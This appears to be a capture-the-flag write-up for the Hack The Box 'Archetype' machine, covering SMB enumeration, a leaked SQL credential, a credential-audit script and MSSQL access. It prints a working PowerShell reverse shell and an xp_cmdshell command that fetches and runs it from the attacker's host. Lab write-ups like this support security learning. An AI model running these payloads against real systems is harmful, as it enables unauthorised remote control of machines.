HTB_Archetype wp
Author: Internet
Just started playing Hack The Box; there are a few things to learn first.
First flag
Start by scanning the ports with nmap.
Four ports are open: 135, 139, 445 and 1433.
445, 139: SMB ports, a known source of risk.
1433: SQL Server port.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 20:27 CST
Nmap scan report for 10.10.10.27
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-20T12:47:39
|_Not valid after: 2051-09-20T12:47:39
|_ssl-date: 2021-09-20T12:53:19+00:00; +25m03s from scanner time.
1782/tcp filtered hp-hcip
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h49m04s, deviation: 3h07m52s, median: 25m02s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-09-20T05:53:08-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-20T12:53:04
|_ start_date: N/A
A lot of host information is visible here.
Port 445 can be probed anonymously with an SMB client; try that first.
smbclient -N -L 10.10.10.27
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
The other three shares are not accessible; only backups can be read.
smbclient -N \\\\10.10.10.27\\backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 20:20:57 2020
.. D 0 Mon Jan 20 20:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 20:23:02 2020
10328063 blocks of size 4096. 8260445 blocks available
This configuration file contains a user ID and a password.
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
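A file like this sitting on a readable share is exactly what a periodic secrets audit of file shares should catch before anyone else does. As an added example (not from the original writeup), here is a Python checker that parses a .dtsConfig in the format shown above, flags every ConnectionString that embeds a password, and returns a redacted copy of the value; the sample file, account name and password value are constructed placeholders, not the box's real ones.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample that mirrors the layout of the prod.dtsConfig above.
# The account and password are placeholders, not real credentials.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=PLACEHOLDER_PW;User ID=CORP\\svc_sql;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
</Configuration>
<Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=db01;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""

# Connection-string keys that carry a secret in OLE DB / SQLNCLI strings.
SECRET_KEYS = {"password", "pwd"}

def parse_connection_string(value):
    """Split 'key=value;key=value' into a dict with lower-cased keys.
    Only the first '=' splits a pair, so values containing '=' survive."""
    pairs = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            pairs[key.strip().lower()] = val.strip()
    return pairs

def find_embedded_credentials(xml_text):
    """Return one finding per <Configuration> whose value embeds a secret.
    Integrated-auth strings (no password key) are not reported."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        pairs = parse_connection_string(node.text)
        secret_keys = sorted(k for k in pairs if k in SECRET_KEYS)
        if not secret_keys:
            continue
        findings.append({
            "path": conf.get("Path", ""),
            "user": pairs.get("user id", pairs.get("uid", "")),
            "secret_keys": secret_keys,
            # Persist Security Info=True keeps the password readable after connect.
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
            "redacted": re.sub(r"(?i)(password|pwd)=[^;]*", r"\1=***", node.text),
        })
    return findings
```

Run it over every *.dtsConfig pulled from a share inventory; a finding with persist_security_info set is the one to rotate first.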
Use mssqlclient.py to connect to the database and obtain a first level of access.
python3 mssqlclient.py sql_svc@10.10.10.27 -windows-auth
Connected successfully and obtained a limited level of access.
The current user is archetype\sql_svc.
1. [Attempt] See whether a CS (Cobalt Strike) beacon can be brought online
The attempt failed; not even DNSLog callbacks got through, which is suspected to be a problem with the target machine.
2. Reverse shell
1. Generate the reverse shell script:
shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.45",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
The IP address here must be changed to your own Kali machine's address.
2. In the folder holding the script, start a web server with Python:
sudo python3 -m http.server 80
Listen on the port configured in the script:
sudo nc -lvnp 443
3. Use the mssql shell obtained above to trigger the reverse shell:
EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.45/shell.ps1") | powershell -noprofile'
Shell received:
The flag, user.txt, is found on the desktop.
# cd desktop
# ls
Directory: C:\Users\sql_svc\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 6:37 AM 32 user.txt
# more user.txt
3e7b102e78218e935bf3f4951fec21a3
# ^C
Second flag
Administrator privileges are needed.
Find the administrator password in the command history, then connect with psexec.py.
After obtaining access as an ordinary user, look into how to reach administrator privileges. From the above, archetype\sql_svc holds three roles at once: an ordinary OS user, a database user, and the account the database service runs as. Accounts of this kind usually hold privileges in the OS beyond those of other ordinary users, such as running high-privilege commands or accessing special files, so check the PowerShell history.
Connect with psexec.py.
The flag is found on the administrator's desktop.
Summary
1. Approach: information gathering with nmap; port 445 was usable and a SQL Server service was running; gather host information, connect to the database service with the leaked user password, obtain the mssql shell, start a reverse shell, escalate privileges, and collect all the flags.
3. Reverse shell steps, generating the code
4. SMB protocol
First box done.
Tags: shell,20,HTB,Windows,wp,Server,sql,10.10,Archetype Source: https://www.cnblogs.com/aeqaqstudy/p/15315873.html